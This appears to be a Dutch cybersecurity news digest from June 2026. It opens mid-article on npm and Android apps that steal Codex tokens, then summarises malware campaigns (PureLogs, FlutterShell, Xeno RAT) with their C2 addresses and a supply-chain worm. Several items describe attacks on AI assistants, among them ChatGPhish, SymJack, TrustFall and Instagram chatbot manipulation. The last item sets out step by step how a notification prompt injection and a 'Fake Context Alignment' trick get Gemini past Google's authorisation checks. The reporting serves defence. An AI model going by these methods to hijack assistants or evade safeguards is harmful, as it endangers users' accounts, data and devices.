Het npm-pakket is niet de enige methode die de dreigingsactor gebruikt om Codex-ontwikkelaars aan te vallen. Aikido heeft een Android-applicatie waargenomen met de naam "OpenClaw Codex Claude AI Agent" (pakketnaam: `gptos.intelligence.assistant`), die het npm-pakket uitvoert binnen zijn PRoot-sandbox en de Codex-referenties naar hetzelfde eindpunt stuurt. De APK-applicatie zelf is klein (26 MB) en ziet er schoon uit bij een Play-scan voorafgaand aan publicatie. Bij de eerste uitvoering extraheert het een van Termux afgeleide Linux-gebruikersomgeving naar de privéopslag van de applicatie en voert Node.js daarin uit via PRoot. De versie is niet vastgepind, dus het apparaat haalt op wat momenteel op npm is gepubliceerd. De exfiltratie is al aanwezig sinds `codexui-android@0.1.82`. Het pakket draait binnen de PRoot-sandbox van de applicatie, waar de in-app Codex-aanmelding zijn `auth.json` schrijft. Zodra de gebruiker is aangemeld, leest het pakket dat bestand uit de sandbox en verzendt het de volledige OAuth-blob naar `sentry.anyclaw.store/startlog`.

De Android-applicatie, uitgebracht door een entiteit genaamd "BrutalStrike", heeft meer dan 50.000 downloads. Dezelfde exfiltratieketen is ook gesignaleerd in een tweede Android-applicatie die gekoppeld is aan BrutalStrike: "Codex" (pakketnaam: `codex.app`), die meer dan 10.000 keer is gedownload. De overige drie applicaties die de ontwikkelaar aanbiedt, bevatten deze functionaliteit niet.

Na contact op te nemen met de pakketauteur op GitHub, meldde Aikido dat deze aanvankelijk een opmerking plaatste waarin stond dat de toegang tot het npm-account was verloren. Vervolgens bewerkte de auteur de reactie en plaatste een andere waarin werd beweerd dat "dit probleem intern wordt onderzocht" en dat "de betreffende functionaliteit en gerelateerde gegevens zijn verwijderd". De auteur beweerde verder dat er geen referentiegegevens met derden zijn gedeeld, zonder te antwoorden waarom deze code alleen in de npm-pakketbuild was ingevoegd of waarom er überhaupt toegang tot de Codex-tokens nodig was. Het X-profiel dat aan de auteur is gekoppeld, bevat het domein `anyclaw[.]store`. WHOIS-records geven aan dat het domein op 12 april 2026 werd geregistreerd, slechts twee dagen nadat de allereerste versie van het npm-pakket (versie 0.1.72) naar npmjs[.]com werd geüpload.

Deze ontwikkeling komt op een moment dat dreigingsactoren steeds vaker echte tools en workflows voor ontwikkelaars van kunstmatige intelligentie (AI) aanvallen om referenties te stelen en dieper in de software-toeleveringsketen door te dringen.

Eind vorige maand ontdekte een Belgisch beveiligingsbedrijf ook dat een verwijderde Google API-sleutel tot 23 minuten lang actief blijft, een venster dat een aanvaller met toegang tot een gelekte sleutel kan benutten om toegang te krijgen tot gebruikersgegevens en andere API’s, inclusief die gerelateerd aan Google Gemini. De gemiddelde intrekkingstijd bedraagt ongeveer 16 minuten. Onderzoeker Joe Leon stelde dat een aanvaller met een verwijderde sleutel verzoeken kan blijven verzenden totdat deze een server bereikt die nog niet is bijgewerkt. Indien Gemini op het project is ingeschakeld, kunnen aanvallers geüploade bestanden dumpen en gecachte gesprekken exfiltreren. Hoewel Google aanvankelijk besloot het probleem niet te verhelpen, met de verklaring dat het een "bekende eigenschap van het systeem en geen beveiligingsprobleem" was, heeft de techgigant sindsdien besloten het te behandelen als een P0-bug, wat betekent dat het een ernstig probleem is dat onmiddellijk moet worden aangepakt. De bevindingen, net als een vergelijkbaar exploitatievenster van 4 seconden dat eerder werd waargenomen met verwijderde Amazon Web Services (AWS) toegangssleutels, benadrukken hoe vertragingen bij het intrekken van referenties exploiteerbaar zijn en kunnen worden gebruikt om ongeautoriseerde toegang te verkrijgen tot cloudomgevingen, terwijl verdedigers ervan uitgaan dat de referenties zijn ingetrokken.

 

Bron: Aikido Security | Bron 2: github.com | Bron 3: offensai.com

02 juni 2026 | E-mails met valse aankooporders verspreiden fileless malware van PureLogs via RAR-archieven

FortiGuard Labs heeft een nieuwe e-mailcampagne onthuld die Windows-gebruikers aanvalt met een datastelend programma genaamd PureLogs. De aanval begint met e-mails met valse aankooporders die slachtoffers verleiden een kwaadaardig archief te openen, genaamd "PO 2026-P0803.rar".

Na het openen van het archief wordt automatisch een verborgen script, "kpankocrs.js", uitgevoerd. Dit script plaatst een willekeurig genoemd bestand, zoals "ps_qnSEGUkU0LIY_1777592585573.ps1", in de map "C:\Temp". Het maakt gebruik van de script engine van Windows (wscript.exe) om PowerShell te activeren en systeembeperkingen te omzeilen.

De aanvallers passen de techniek process hollowing toe om detectie te voorkomen. Hierbij wordt een legitiem Windows-proces, in dit geval "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe", gekaapt. De veilige code van dit proces wordt vervangen door een kwaadaardige downloader module. Dit kapen gebeurt via specifieke commando's van het systeem: CreateProcessA() opent het legitieme programma in een bevroren staat, ZwUnmapViewOfSection() leegt het geheugen, WriteProcessMemory() injecteert de kwaadaardige code, en ResumeThread() dwingt de computer om de verborgen dreiging uit te voeren.

Zodra de malware actief is binnen MsBuild.exe, wordt een interne module genaamd "Iwnflr.exe" geëxtraheerd om de volgende fase te starten. Dit bestand laadt de bron "Eqxcpvgf.Ybrgdoxas" via ResourceManager.GetObject(). Vervolgens wordt deze bron ontsleuteld met het DES-algoritme en gedecomprimeerd met Gunzip, waarna een downloader met de naam "Rmiyj.dll" wordt samengesteld.

De taak van deze downloader is om een verbinding tot stand te brengen met een externe C2-server op 77.83.39.211 via poort 8443 voor het verzenden van webverzoeken. Dit leidt tot het ophalen van de uiteindelijke payload. Eerst wordt een HTTP GET-verzoek naar het "/ping"-endpoint gestuurd om te bevestigen dat de server actief is, gevolgd door een HTTP POST-verzoek naar het "/plugin"-endpoint om een fileless variant van PureLogs genaamd "zgSGkYYzqVe.dll" te downloaden. Door de uitvoering in het geheugen van deze plugin blijven er geen sporen achter op de fysieke harde schijf.

De PureLogs malware begint vervolgens met het stelen van gevoelige gegevens, gericht op een breed scala aan browsers, cryptocurrency wallets en applicaties. Het steelt opgeslagen inloggegevens, geschiedenis en cookies van Chrome, Firefox, Brave, Vivaldi en Microsoft Edge. Daarnaast richt het zich op bestanden van crypto wallets, privésleutels en transactiegeschiedenissen van Bitcoin Core, Dogecoin Core, Litecoin Core, Exodus en Atomic Wallet.

Bovendien bemachtigt de malware Discord-authenticatietokens en accountwachtwoorden van Outlook, FileZilla, ProtonVPN en OpenVPN. De laatste stap is het bundelen van de gestolen gegevens met een JPEG-screenshot van het bureaublad, systeem informatie, klembord gegevens en de gebruikersnaam. Dit datapakket wordt geserialiseerd, gecomprimeerd met GZip en versleuteld met een AES-sleutel. De versleutelde bundel wordt vervolgens via HTTP POST-verzoeken naar de "/browser" en "/discord"-endpoints naar de server van de aanvallers verzonden.

De beveiligingsfilters van FortiMail hebben deze phishing-e-mails onderschept en de onderwerpregel gemarkeerd als "virus detected", waardoor de kwaadaardige bestanden de inboxen van gebruikers niet konden bereiken. Om de risico's van deze ontwijkende campagne te beperken, adviseren onderzoekers organisaties om strikte e-mailfiltering toe te passen, onnodige scriptuitvoering uit te schakelen en actief te monitoren op afwijkende PowerShell-activiteit en process hollowing.

Diverse cybersecurity experts hebben hun inzichten gedeeld. Jason Soroko, Senior Fellow bij Sectigo, benadrukte dat de campagne aantoont hoe dreigingsactoren zich succesvol verbergen binnen normale zakelijke activiteiten en tools voor systeembeheer, waarbij process hollowing wordt gebruikt om een .NET downloader in een vertrouwde Windows MSBuild executable te injecteren. Kern Smith, Senior Vice President van Global Solutions Engineering bij Zimperium, waarschuwde dat beveiligingsteams verder moeten kijken dan de zichtbaarheid van endpoints en verdachte activiteiten vroegtijdig moeten kunnen identificeren en correleren over mobiele apparaten, applicaties en endpoints. Maxime Cartier, Vice President of Human Risk bij Hoxhunt, legde uit dat het menselijke element een primaire barrière blijft, aangezien de aanvalsketen volledig afhangt van het openen van een kwaadaardige bijlage, wat de noodzaak van een gedragsmatige benadering van beveiligingsrisico's onderstreept.

 

Bron: FortiGuard Labs

03 juni 2026 | Valsche ChatGPT-apps verspreiden wachtwoordstelende malware via advertenties

Hackers misbruiken steeds vaker vertrouwde kunstmatige intelligentie (AI)-platforms zoals ChatGPT en Claude om gebruikers aan te vallen. Recentelijk werd een kwetsbaarheid genaamd ClaudeBleed ontdekt, die ongeautoriseerde browser-extensies in staat stelde de interface van Anthropic Claude te kapen. Nu maken aanvallers misbruik van de officiële functionaliteiten van deze AI tools om malware te verspreiden en tegelijkertijd webfilters en beveiligingscontroles te omzeilen.

Beveiligingsonderzoek van Push Security onthult een campagne genaamd LLMShare, die gebruikmaakt van zogenaamde InstallFix-aanvallen. Deze aanvallen, een variant van de ClickFix-familie, exploiteren het feit dat AI tools de installatie via de commandoregel hebben genormaliseerd, zelfs voor gebruikers die onvoldoende ervaring hebben om legitieme terminalcommando's van kwaadaardige te onderscheiden. Hackers gebruikten de functionaliteit voor het renderen van code van ChatGPT om een valse storingsmelding te creëren binnen een echte link. Deze pagina beweerde dat de webversie tijdelijk niet beschikbaar was en drong er bij gebruikers op aan een desktopapplicatie te downloaden, waarna zij werden omgeleid naar een website die leek op de originele: openew.app.

Deze downloadwebsite was slim ontworpen om kwaadaardige uitvoerbare bestanden te leveren, ontwikkeld voor zowel Windows als macOS. Op Mac-apparaten werd de payload geïdentificeerd als Odyssey Stealer, een variant van Atomic macOS Stealer die zich richt op in browsers opgeslagen wachtwoorden, cryptowallets en sessietokens. De downloadwebsite maakte gebruik van een techniek voor conditionele weergave om detectie van malware te voorkomen. Wanneer geautomatiseerde scanners, zoals URLScan, de link controleerden, maskeerde de website zichzelf door een onschadelijke website van een virtual reality-bedrijf te tonen, terwijl echte gebruikers de malwareval zagen.

Een andere kwetsbaarheid, genaamd ChatGPhish, werd ontdekt en gerapporteerd door Permiso Security. Deze kwetsbaarheid richt zich op de manier waarop ChatGPT Markdown-inhoud verwerkt bij het samenvatten van websites van derden. Onderzoekers merkten op dat een aanvaller kwaadaardige code in een gewone webpagina kan injecteren. Wanneer een gebruiker ChatGPT vervolgens vraagt die pagina samen te vatten, haalt de AI automatisch de live, klikbare phishinglinks, QR-codes of valse beveiligingswaarschuwingen van de aanvaller rechtstreeks in de vertrouwde chatinterface. Dit is geen kwetsbaarheid van de browser, maar een probleem waarbij door aanvallers gecontroleerde inhoud wordt weergegeven als vertrouwde gebruikersinterface binnen de LLM-ervaring.

Daarnaast rapporteerde Adversa AI twee kritieke technieken gericht op ontwikkelaars: SymJack en TrustFall. SymJack is een aanval die AI-codeerassistenten misleidt tot een ogenschijnlijk onschuldige bestandskopie die hun eigen configuratiebestanden overschrijft, leidend tot uitvoering van code op afstand. TrustFall is een methode die kwaadaardige software-opslagplaatsen gebruikt om gevaarlijke commando's automatisch goed te keuren via het Model Context Protocol (MCP) zonder gebruikersakkoord.

Deze campagnes voor het stelen van informatie hebben gevaarlijke reële gevolgen. Het IBM X-Force 2026 Threat Intelligence Index-rapport toonde aan dat meer dan 300.000 ChatGPT-inloggegevens al zijn gelekt op het darkweb.

 

Bron: permiso.io | Bron 2: adversa.ai

03 juni 2026 | De browser als frontlinie voor AI-beveiliging tegen geavanceerde cyberaanvallen

Beveiligingsteams worden geconfronteerd met een tweeledig probleem op het gebied van kunstmatige intelligentie (AI). Aan de ene kant gebruiken aanvallers AI om phishingkits te verbeteren, overtuigende lokmiddelen te genereren en hun infrastructuur sneller te wisselen dan traditionele blokkeerlijsten kunnen bijhouden. Aan de andere kant omarmen werknemers AI tools in hoog tempo, vaak zonder adequate beveiligingscontroles. Dit leidt ertoe dat gevoelige gegevens in Large Language Models (LLM's) worden geplakt, OAuth-rechten worden verleend aan AI-agents, en ongecontroleerde AI-browser-extensies worden geïnstalleerd. Beide problemen manifesteren zich primair in de browser, wat deze tot een cruciale frontlinie maakt voor moderne cyberbeveiliging.

Volgens onderzoek van Push Security versnelt AI de ontwikkeling van aanvallershulpmiddelen. Phishing-as-a-Service (PhaaS) tools en kits worden sneller gecreëerd en geüpdatet. Een voorbeeld hiervan is de snelle evolutie van ClickFix, dat nieuwe technieken zoals InstallFix en ConsentFix introduceert. Een andere zorgwekkende ontwikkeling is 'device code phishing', een methode die misbruik maakt van legitieme OAuth-stromen om Multi-Factor Authenticatie (MFA) en passkeys volledig te omzeilen. Deze techniek is in 2026 geëxplodeerd, waarbij het aantal actieve kits met een factor 18 is toegenomen en detecties 37 keer vaker voorkomen. Cybercrimegroepen zoals ShinyHunters en BlackFile maken uitgebreid gebruik van dergelijke kits, waaronder Doko's Panel en afgeleide varianten, waarin zwaar AI-gebruik is waargenomen. Overvloedige commentaren in de paginacode worden gezien als een duidelijke indicator van ontwikkeling met assistentie van AI.

De effectiviteit van detecties gebaseerd op Indicators of Compromise (IoC's) neemt af. AI verlaagt de kosten voor het opzetten van overtuigende phishing-infrastructuur aanzienlijk. Een geloofwaardige phishingpagina kan binnen enkele minuten worden 'vibecoded', geïmplementeerd op een nieuw domein, slachtoffers maken en weer worden verwijderd voordat reputatiediensten deze kunnen markeren. Spamhaus rapporteert dat 89% van de phishingdomeinen minder dan twee dagen actief is. Voor organisaties die vertrouwen op blokkeerlijsten en IoC-feeds, is elke phishingaanval effectief een zero-day. Bovendien wordt misbruik gemaakt van legitieme sites voor het hosten en leveren van phishinglinks, zoals te zien is bij de LLMShare-campagne, die legitieme chatgpt.com-sharinglinks gebruikt voor malvertising via zoekmachineadvertenties die extreem moeilijk te herkennen zijn.

AI maakt het ook eenvoudiger om campagnes via meerdere kanalen op te zetten. Gegevens van Push Security tonen aan dat ongeveer 1 op de 3 phishing-payloads via andere kanalen dan e-mail arriveert, zoals malvertising, sociale media en SEO-poisoning. Bij ClickFix-campagnes komt zelfs 4 op de 5 payloads specifiek via resultaten van zoekmachines binnen. Beveiliging van e-mail is structureel blind voor deze snelgroeiende leveringskanalen. De browser, waar payloadlevering en overname van accounts daadwerkelijk plaatsvinden, is daarom de laag waar detectie moet opereren, door het analyseren van paginagedrag, scriptuitvoering en kwaadaardige mechanismen zoals sessiediefstal, kopiëren en plakken, en bestanddownloads.

 

Bron: Push Security

03 juni 2026 | Red Hat verwijdert software na supply chain aanval via gecompromitteerd GitHub-account

Red Hat heeft maandag tientallen softwarepakketten uit zijn distributiepijplijn verwijderd, nadat aanvallers een gecompromitteerd GitHub-account hadden gebruikt om malware voor het stelen van inloggegevens te verspreiden onder ontwikkelaars. Volgens de voorlopige analyse van het bedrijf werd via het gecompromitteerde GitHub-account kwaadaardige code verspreid naar klanten, waarbij 32 pakketten werden getroffen die wekelijks ongeveer 117.000 keer werden gedownload. Red Hat heeft de getroffen pakketten sindsdien verwijderd en stelt dat "op basis van de huidige bevindingen geen acties van klanten vereist zijn."

De aanval maakte gebruik van een variant van de Mini Shai-Hulud zelfverspreidende worm, waarvan de volledige broncode op 12 mei online werd gepubliceerd door de cybercriminele groep TeamPCP. Zoals cybersecuritybedrijf Tenable opmerkte, kondigden de criminelen "gelijktijdig een wedstrijd van $1.000 aan op BreachForums voor de grootste supply chain aanval met behulp van de code." Of de aanval van maandag werd uitgevoerd door TeamPCP zelf of door een andere actor die de gepubliceerde code gebruikte, kon niet onmiddellijk worden vastgesteld, aldus onderzoekers.

Palo Alto Networks' Unit 42 waarschuwde dat het openbaar maken van de broncode van de worm al tot copycat-activiteiten heeft geleid, waardoor definitieve attributie moeilijker wordt en dat Mini Shai-Hulud "niet langer beperkt is tot TeamPCP." De malware van de aanval, die de auteurs Miasma noemden, verschilde slechts cosmetisch van het origineel van TeamPCP; verwijzingen naar de sciencefictionreeks Dune werden vervangen door Griekse mythologie, terwijl de onderliggende functionaliteit voor het stelen van inloggegevens intact bleef.

De aanval van maandag is de meest recente in een reeks supply chain inbreuken die teruggaan tot september 2025, toen de originele Shai-Hulud worm leidde tot een CISA-advies, en die enkele van 's werelds meest gebruikte ontwikkelaarstools hebben getroffen. Recente incidenten omvatten een aanval in maart op LiteLLM, waardoor cybercriminelen verschillende organisaties konden binnendringen, waaronder AI-recruitmentbedrijf Mercor. De aanval op LiteLLM werd gevolgd door een aparte reeks compromitteringen die werden toegeschreven aan Noord-Koreaanse hackers, gericht op de axios JavaScript-bibliotheek. Die campagne bracht Charles Carmakal, Chief Technology Officer van Mandiant, ertoe te waarschuwen dat "de geheimen die de afgelopen twee weken zijn gestolen, de komende dagen, weken en maanden meer supply chain aanvallen, compromitteringen van Software-as-a-Service omgevingen, ransomware- en afpersingsincidenten, en cryptodieften mogelijk zullen maken."

In mei bevestigde GitHub dat het was gecompromitteerd door TeamPCP nadat een apparaat van een werknemer was gecompromitteerd via een kwaadaardige Visual Studio Code-extensie, waarbij de groep $50.000 eiste voor gestolen broncode en dreigde deze gratis te lekken als er geen koper kwam. OpenAI had ook gewaarschuwd dat twee van zijn werknemersapparaten in dezelfde golf waren gecompromitteerd, na een supply chain aanval op de open source bibliotheek TanStack. Ten tijde van de LiteLLM-compromittering waarschuwde Adam Reynolds, senior security researcher bij Sonatype, dat omdat "de malware een breed scala aan inloggegevens target... dit het potentieel creëert voor tweede- en derderangs effecten die zich in de loop van de tijd kunnen verspreiden, leidend tot verdere inbreuken, serviceonderbrekingen of misbruik van gevoelige gegevens ver buiten het initiële compromitteringspunt."

 

Bron: Red Hat | Bron 2: tenable.com | Bron 3: unit42.paloaltonetworks.com

03 juni 2026 | Nieuwe Instagram-exploit misbruikt Meta's AI-chatbot voor stelen gebruikersnamen

Een recente ontdekking wijst op een exploit binnen Instagram die misbruik maakt van de AI-chatbot van Meta. Deze chatbot, die onvoldoende beveiligingsmechanismen zou hebben, wordt ingezet door kwaadwillenden om premium gebruikersnamen te bemachtigen, met name de gewilde 'one-letter' accounts. De methode omvat het misleiden van de AI door het gebruik van verborgen karakters, waarna de chatbot wordt overgehaald om de gewenste wijziging van de gebruikersnaam toe te passen.

De exploit stelt verkopers in staat om via slinkse methoden toegang te krijgen tot unieke en waardevolle Instagram-gebruikersnamen. Door de AI te manipuleren met specifieke, verborgen tekens, kunnen zij de chatbot ertoe bewegen om beheerdersacties uit te voeren en de gewenste gebruikersnaamoverdracht te bewerkstelligen. Monitoringbots hebben reeds waargenomen dat originele, korte gebruikersnamen op deze manier van eigenaar wisselen.

Dit incident benadrukt de risico's die gepaard gaan met de integratie van AI-systemen in platforms waar gevoelige gebruikersgegevens en beheerrechten een rol spelen. Een gebrek aan robuuste 'guardrails' of beveiligingsprotocollen in AI-chatbots kan leiden tot onbedoelde kwetsbaarheden die door kwaadwillende actoren worden uitgebuit. Voor Instagram-gebruikers, inclusief die in Nederland en België, betekent dit een potentieel risico op het verlies van hun unieke accountnamen aan derden. Het incident onderstreept de noodzaak voor Meta om de beveiliging van zijn AI-systemen grondig te herzien en te versterken om dergelijke manipulaties te voorkomen en de integriteit van gebruikersaccounts te waarborgen. De exacte technische details van de gebruikte verborgen karakters en de wijze waarop de AI precies wordt misleid, zijn niet verder gespecificeerd in de melding.

 

Bron: Cybercrimeinfo

03 juni 2026 | Nieuwe FlutterShell macOS backdoor verspreid via Google Ads malvertising

Onderzoekers van Unit 42 hebben een wijdverbreide malvertising campagne gedetecteerd die gericht is op macOS-gebruikers. Deze campagne, genaamd "Operation FlutterBridge", verspreidt de nieuwe FlutterShell backdoor en lijkt een verdere ontwikkeling te zijn van de "JSCoreRunner" campagne die in augustus 2025 voor het eerst werd geïdentificeerd. De financieel gemotiveerde aanvallers achter deze campagnes zijn overgestapt van het leveren van standaard adware naar adware met volledige backdoor functionaliteiten.

FlutterShell, gebouwd met het Flutter framework, infecteert slachtoffers met adware via kwaadaardige desktop applicaties. Naast de adware functionaliteit beschikt de payload over uitgebreide backdoor mogelijkheden, waaronder de uitvoering van shell commando's en manipulatie van bestandssystemen. Sommige varianten misbruiken zelfs functies voor AI samenvattingen voor data exfiltratie, waarbij documenten via een door de aanvaller beheerde server worden gerouteerd voordat ze worden verwerkt. De FlutterShell malware wordt actief doorontwikkeld, waarbij snel nieuwe verbeteringen in de code worden geïntegreerd.

Operation FlutterBridge richt zich op een wereldwijd publiek via een uitgebreide Google Ads campagne, met een sterke nadruk op Engelstalige en West-Europese markten. Honderden door Google geverifieerde advertenties worden hiervoor gebruikt. Onderzoek wijst uit dat de aanvallers achter dit cluster van activiteiten een reeks dekmantelbedrijven inzetten om de controle van advertentienetwerken te omzeilen en deze aanvallen op grote schaal te orkestreren. Unit 42 heeft deze adverteerders gemeld bij Google, dat heeft laten weten de betreffende adverteerdersaccounts te hebben opgeschort wegens schending van hun beleid.

Unit 42 volgt Operation FlutterBridge en de JSCoreRunner campagne onder de clusteractiviteit die zij aanduiden als CL-CRI-1089. Palo Alto Networks klanten worden beschermd tegen de beschreven dreigingen via producten zoals Advanced WildFire, Advanced URL Filtering, Advanced DNS Security, Cortex Agentix Threat Intel Agent, Cortex XDR en XSIAM.

 

Bron: Unit 42 | Bron 2: github.com | Bron 3: mastodon.social

03 juni 2026 | Pakistan-gelinkte SideCopy richt zich op Afghaanse overheid met Xeno RAT

Cybersecurityonderzoekers hebben details bekendgemaakt van een spear phishing campagne die vermoedelijk is uitgevoerd door de aan Pakistan gelinkte groep SideCopy. De campagne richtte zich op het Afghaanse Ministerie van Financiën met een open source remote access trojan, genaamd Xeno RAT. De activiteiten zijn door Seqrite Labs gedetailleerd beschreven en hebben de codenaam Operation XENOFISCAL gekregen.

De aanval begint met een spear phishing levering, waarbij een ZIP-archief wordt gebruikt dat een kwaadaardig LNK-bestand bevat. Dit bestand is voorzien van een zorgvuldig opgestelde Pashto taal bestandsnaam, wat duidt op een diepgaande kennis van de doelomgeving. Naast het Ministerie van Financiën waren ook provinciale inkomsten- en financiële directies, Pashto sprekende overheidsfunctionarissen en provinciale overheidsmedewerkers doelwit van de campagne.

SideCopy is de naam van een dreigingsgroep die opereert onder de bredere Transparent Tribe (ook bekend als APT36) paraplu. Deze groep staat bekend om het gebruik van diverse malwarefamilies voor het stelen van gevoelige data van gecompromitteerde systemen. Eerder, in april 2025, werd de groep in verband gebracht met aanvallen op verschillende sectoren in India, waarbij Xeno RAT, Spark RAT en CurlBack RAT werden ingezet. De huidige campagne is een voortzetting van deze bredere reeks kwaadaardige cyberactiviteiten gericht op entiteiten in Zuid-Azië.

Na uitvoering misbruikt het Windows Shortcut (LNK) bestand "mshta.exe" om een HTML Application (HTA) op te halen van een gecompromitteerd Afghaans onderwijsdomein. Dit leidt tot de uitvoering van geobfusceerde JavaScript code in het geheugen. De malware creëert ook register gebaseerde persistentie door Microsoft Edge te imiteren, terwijl het Xeno RAT 1.8.7 en een afleidingsdocument dropt via een op DLL gebaseerde loader.

Xeno RAT is ontworpen om via TCP verbinding te maken met een externe server en commando's van de operator te ontvangen. De malware kan externe DLL-modules laden en uitvoeren, data naar de server verzenden, zichzelf starten via een geplande taak, antivirusinformatie ophalen, SOCKS5 proxy gebaseerde netwerk tunneling ondersteunen, bestandsoperaties uitvoeren, toetsaanslagen loggen, schermafbeeldingen maken, het klembord monitoren, webcam en microfoon volgen, persistentiemethoden verwijderen en zichzelf de-installeren.

Deze onthulling valt samen met het verschijnen van details over een gerichte phishing operatie die gebruikmaakt van geprepareerde Linux .desktop bestanden. Deze operatie richtte zich op de Indiase militaire infrastructuur met lokmiddelen gerelateerd aan contracten voor de aanschaf van Indiase gepantserde voertuigen. Deze campagne wordt eveneens toegeschreven aan Transparent Tribe. Een rapport van beveiligingsonderzoeker R.D. Tarun van vorige maand beschrijft hoe deze campagne zich richt op individuen die verbonden zijn met de Indiase militaire en defensie-infrastructuur via WhatsApp gebaseerde social engineering en een gefaseerde shell payload levering. Na uitvoering initieert de kwaadaardige .desktop launcher een zwaar geobfusceerde, op shell gebaseerde infectieketen, inclusief gefaseerde payload retrieval, inline decodering routines en de implementatie van een op Golang gebaseerde ELF-implantaat, genaamd DeskRAT.

 

Bron: Seqrite Labs

04 juni 2026 | CISA waarschuwt voor cyberaanvallen op brandstoftank monitoringsystemen

CISA, de FBI, de NSA, het Amerikaanse Ministerie van Energie en andere Amerikaanse overheidsinstanties waarschuwen voor cyberaanvallen gericht op via internet toegankelijke automatische tankmeetinstrumenten (ATG-systemen). Deze systemen worden gebruikt voor het monitoren van brandstof- en vloeistofopslagtanks in diverse vitale infrastructuursectoren. Het cybersecurity-agentschap stelt dat ATG-systemen veelvuldig worden toegepast in de energie-, chemische, voedsel- en landbouw- en transportsystemensector om op afstand opslagtankniveaus, temperaturen en potentiële lekken te bewaken.

Volgens de Amerikaanse overheid richten dreigingsactoren zich op blootgestelde apparaten en wijzigen zij systeeminstellingen door het uitvoeren van commando's. De waarschuwing, die de Amerikaanse overheid nog niet heeft toegeschreven aan een specifieke staat of dreigingsgroep, beschrijft hoe cyberdreigingsactoren via internet toegankelijke ATG-systemen compromitteren en deze vervolgens aanpassen door commando's uit te voeren.

Aanvallers verkrijgen toegang door misbruik te maken van kwetsbaarheden die authenticatie omzeilen, vastgelegde inloggegevens, fouten in de uitvoering van commando's van het besturingssysteem, SQL-injectie kwetsbaarheden en zwakheden in privilege-escalatie. Indien een systeem succesvol wordt gecompromitteerd, kunnen de aanvallers netwerkinstellingen, productidentificatoren, tankvolumes en pompbediening wijzigen. Ze kunnen ook waarschuwingen uitschakelen en omstandigheden creëren die voorkomen dat operators de tankvulniveaus correct monitoren, wat het risico op lekken of storingen van apparatuur potentieel verhoogt.

De instanties dringen er bij organisaties op aan om ATG-systemen af te schermen van het internet, toegang op afstand te beperken via firewalls, VPN's of toegangscontrolelijsten, standaardwachtwoorden te vervangen, sterke inloggegevens en meervoudige authenticatie te gebruiken, beveiligingsupdates toe te passen en systemen actief te monitoren op ongeautoriseerde wijzigingen.

Hoewel de waarschuwing de activiteit niet toeschrijft aan een specifieke dreigingsactor, volgt deze op een rapportage van CNN in mei, waarin werd gemeld dat Iraanse hackers verantwoordelijk waren voor een reeks inbraken waarbij ATG-systemen bij benzinestations in meerdere Amerikaanse staten betrokken waren. Volgens CNN exploiteerden de aanvallers ATG-systemen die met het internet waren verbonden en beschermd werden door zwakke of ontbrekende wachtwoorden, waardoor zij toegang kregen tot weergaven en deze konden manipuleren. De aanvallers wijzigden echter niet de werkelijke brandstofniveaus. De incidenten veroorzaakten naar verluidt geen fysieke schade, maar wekten bezorgdheid dat aanvallers potentieel kunnen interfereren met lekdetectie en andere veiligheidsgerelateerde functies. CNN meldde dat Iran de primaire verdachte was vanwege hun geschiedenis van het aanvallen van brandstofbeheersystemen en andere industriële controlesystemen. Desondanks stelden meerdere bronnen die op de hoogte waren van het onderzoek, volgens CNN, dat het mogelijk niet lukt om de activiteit toe te schrijven aan een specifieke aanvaller, omdat er beperkt forensisch bewijs is achtergelaten bij de aanvallen. CISA en haar partners adviseren organisaties die ATG-systemen beheren om hun blootstelling te evalueren en de aanbevolen mitigaties onmiddellijk te implementeren om het risico op compromittering te verminderen.

 

Bron: CISA | Bron 2: ic3.gov | Bron 3: cnn.com

04 juni 2026 | Nieuwe aanvalstechniek kaapt Google Gemini via kwaadaardige notificaties

Onderzoekers van SafeBreach hebben een aanvalstechniek ontdekt waarmee de voice assistent Google Gemini op Android-apparaten gekaapt kan worden door middel van een enkele kwaadaardige notificatie. Deze notificaties kunnen afkomstig zijn van populaire apps zoals WhatsApp, Slack, sms, Signal, Instagram of Messenger. Een kwaadaardige app op het apparaat is niet vereist; Gemini hoeft de vijandige notificatie alleen als bruikbare context te interpreteren.

De ontdekking, gepubliceerd door Or Yair van SafeBreach, bouwt voort op eerder onderzoek naar 'Invitation Is All You Need'-aanvallen, die vergelijkbare trucs uitvoerden via kwaadaardige Google Agenda-uitnodigingen. Hoewel Google Gemini na dat eerdere werk had versterkt tegen indirecte prompt injectie, vond Yair een manier om deze nieuwe verdedigingsmechanismen te omzeilen. Google heeft de kwetsbaarheid inmiddels gepatcht. SafeBreach heeft geen CVE-nummer voor dit probleem vermeld en er is geen bewijs dat de techniek ooit in de praktijk is gebruikt.

De aanval is specifiek voor Android, omdat Gemini's 'Utilities'-functie daar notificaties kan lezen en beantwoorden. De agent die deze notificaties leest, behandelt hun tekst als instructies. Elk mechanisme dat een notificatie naar een telefoon kan sturen, kan zo een payload leveren, een aanvalsoppervlak dat Yair als "effectief oneindig" omschreef.

De impact van de aanval is breed. Aanvallers kunnen de output van Gemini herschrijven, inclusief het faken van berichten van contactpersonen. Zo kan een gesproken bericht als "uw manager vroeg u om de documenten naar deze Drive map te uploaden" moeilijk te onderscheiden zijn van een legitiem verzoek. De methode kan ook worden gebruikt om fysieke acties te initiëren, zoals het openen van een venster of het starten van een app, acties die Google's eerdere mitigaties moesten voorkomen. Verdere gevolgen omvatten smart home controle via Google Home (ramen, boilers, verlichting), tracking en downloads via URL's, en het geforceerd laten deelnemen aan Zoom-vergaderingen. De techniek maakt zelfs geheugenvergiftiging mogelijk, waarbij Gemini een door de aanvaller gekozen feit permanent opslaat op account-niveau, en persistentie via geplande acties.

Om Google's nieuwe verdedigingsmechanismen te omzeilen, ontwikkelde Yair de 'Fake Context Alignment'-techniek. Deze techniek creëert twee illusies tegelijkertijd: een legitiem ogende autorisatie voor de beveiligingscheck van Google en een onschuldige uitwisseling voor de gebruiker. Dit wordt bereikt via 'versluiering' (Obfuscated) en 'demping' (Muted):

*   **Versluierd:** Gemini stelt de echte autorisatievraag in een onbegrijpelijke taal (bijvoorbeeld Chinees), gevolgd door een onschuldige Engelse vraag. De gebruiker zegt "Ja" op de Engelse vraag, en de backend koppelt die "Ja" aan de verborgen autorisatie.

*   **Gedempt:** De kwaadaardige vraag wordt verborgen in een hyperlink die de tekst-naar-spraak functie van Gemini overslaat. De assistent spreekt een generieke foutmelding uit, terwijl op het scherm de autorisatievraag wordt getoond. De gebruiker zegt "Ja", en de on-screen tekst wordt verwerkt.

De combinatie van deze methoden stelt aanvallers in staat om Google's controles te passeren terwijl voor de gebruiker een normale uitwisseling klinkt.

